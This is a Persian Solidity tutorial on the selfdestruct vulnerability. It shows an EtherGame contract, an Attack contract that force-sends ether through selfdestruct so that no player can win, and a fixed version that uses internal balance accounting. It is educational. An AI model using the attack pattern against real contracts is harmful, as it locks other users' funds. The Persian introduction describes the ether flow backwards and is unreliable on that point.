سالیدیفا

آسیب پذیری خود تخریبی (Self Destruct)

قرارداد های هوشمند میتونن با صدا زدن selfdestruct خودشون رو از بلاکچین حذف کنن.

صدا زدن selfdestruct باعث میشه کل Ether ذخیره شده توی قرارداد به یه آدرس از پیش تعیین شده ارسال بشه.

آسیب پذیری #

یه قرارداد خبیث میتونه با صدا زدن selfdestruct قرارداد رو مجبور کنه تا کل اتر داخل قرارداد به ولت یا قرارداد دیگه(از پیش تعیین شده) ارسال بشه.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

// The goal of this game is to be the 7th player to deposit 1 Ether.
// Players can deposit only 1 Ether at a time.
// Winner will be able to withdraw all Ether.

/*
1. Deploy EtherGame
2. Players (say Alice and Bob) decides to play, deposits 1 Ether each.
2. Deploy Attack with address of EtherGame
3. Call Attack.attack sending 5 ether. This will break the game
  No one can become the winner.

What happened?
Attack forced the balance of EtherGame to equal 7 ether.
Now no one can deposit and the winner cannot be set.
*/

contract EtherGame {
  uint256 public targetAmount = 7 ether;
  address public winner;

  function deposit() public payable {
    require(msg.value == 1 ether, "You can only send 1 Ether");

    uint256 balance = address(this).balance;
    require(balance <= targetAmount, "Game is over");

    if (balance == targetAmount) {
      winner = msg.sender;
    }
  }

  function claimReward() public {
    require(msg.sender == winner, "Not winner");

    (bool sent,) = msg.sender.call{value: address(this).balance}("");
    require(sent, "Failed to send Ether");
  }
}

contract Attack {
  EtherGame etherGame;

  constructor(EtherGame _etherGame) {
    etherGame = EtherGame(_etherGame);
  }

  function attack() public payable {
    // You can simply break the game by sending ether so that
    // the game balance >= 7 ether

    // cast address to payable
    address payable addr = payable(address(etherGame));
    selfdestruct(addr);
  }
}

تکنیک های جلوگیری #

روی address(this).balance حساب نکنید.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

contract EtherGame {
  uint256 public targetAmount = 3 ether;
  uint256 public balance;
  address public winner;

  function deposit() public payable {
    require(msg.value == 1 ether, "You can only send 1 Ether");

    balance += msg.value;
    require(balance <= targetAmount, "Game is over");

    if (balance == targetAmount) {
      winner = msg.sender;
    }
  }

  function claimReward() public {
    require(msg.sender == winner, "Not winner");

    (bool sent,) = msg.sender.call{value: balance}("");
    require(sent, "Failed to send Ether");
  }
}

توی Remix امتحانش کنین:

احساست در مورد این مقاله چیه؟